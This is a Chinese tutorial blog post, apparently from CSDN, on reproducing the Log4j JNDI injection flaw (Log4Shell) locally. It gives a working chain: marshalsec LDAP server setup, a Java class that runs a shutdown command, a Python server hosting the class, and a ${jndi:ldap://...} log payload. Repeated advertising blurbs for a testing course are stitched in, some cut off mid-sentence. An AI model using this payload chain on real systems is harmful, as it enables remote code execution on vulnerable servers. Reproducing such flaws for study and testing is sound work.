Log4j 漏洞测试(1)

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

克隆代码到本地,mvn clean package -DskipTests打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar

2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等)

示例: 功能是在windows系统下,3600秒后关机

import java.io.File;

import java.io.IOException;

/**

  • @author rxf113

*/

public class InjectClass {

public InjectClass() {

try {

Runtime.getRuntime().exec(new String[]{“cmd.exe”, “/c”, “Shutdown.exe -s -t 3600”});

// new File(System.getProperty(“user.dir”) + “\” + System.currentTimeMillis() + “.txt”).createNewFile();

} catch (IOException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

new InjectClass();

}

}

3、对上面的类执行 javac 编译,然后启动一个http 服务器,能通过服务器访问到编译后的 class 文件

示例: 使用python,我编译后的class文件在F:\log4j2-test\src\main\java目录下。在 cmd窗口运行以下命令

python -m http.server 9011 -d F:\log4j2-test\src\main\java

如果成功,浏览器访问 http://127.0.0.1:9011/InjectClass.class 就能下载到class文件。

4、新打开一个 cmd 窗口启动第一步打包好的jar包。

参照命令:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer # []

示例: 启动 LDAPSERVER

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://127.0.0.1:9011/#InjectClass”

启动成功后: 控制台会输出监听的端口为:1389

所需的步骤全部做完了,接下来开始测试

1、运行本地待测试的项目。使用 log4j 打印日志

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

/**

  • @author rxf113

*/

public class Start {

private static final Logger logger = LogManager.getLogger(Start.class);

public static void main(String[] args) {

System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”,“true”);

logger.error(“${jndi:ldap://127.0.0.1:1389/InjectClass}”);

}

}

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值